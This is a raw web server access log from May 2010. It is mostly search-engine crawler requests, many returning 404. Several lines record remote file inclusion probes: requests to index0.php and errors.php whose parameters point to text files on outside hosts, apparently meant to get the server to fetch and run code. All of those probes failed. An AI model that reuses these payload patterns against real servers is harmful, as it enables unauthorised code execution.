210.125.133.87 - - [02/May/2010:21:39:34 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:21:39:34 -0500] "GET /logs/access_log.1262649600/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.218.116.131 - - [02/May/2010:21:42:01 -0500] "GET /logs/access_log.1236124800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
210.125.133.87 - - [02/May/2010:21:42:49 -0500] "GET /logs/access_log.1262390400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:21:42:53 -0500] "GET /logs/access_log.1262390400/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:21:43:41 -0500] "GET /logs/access_log.1270684800%20%20/errors.php?error=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.218.116.162 - - [02/May/2010:21:44:15 -0500] "GET /logs/access_log.1244419200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [02/May/2010:21:45:56 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2938 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [02/May/2010:21:53:41 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.44 - - [02/May/2010:21:54:05 -0500] "GET /artwork/playhouse.htm HTTP/1.1" 200 521 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.13 - - [02/May/2010:21:54:37 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.44 - - [02/May/2010:21:55:08 -0500] "GET /logs/access_log.1233100800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
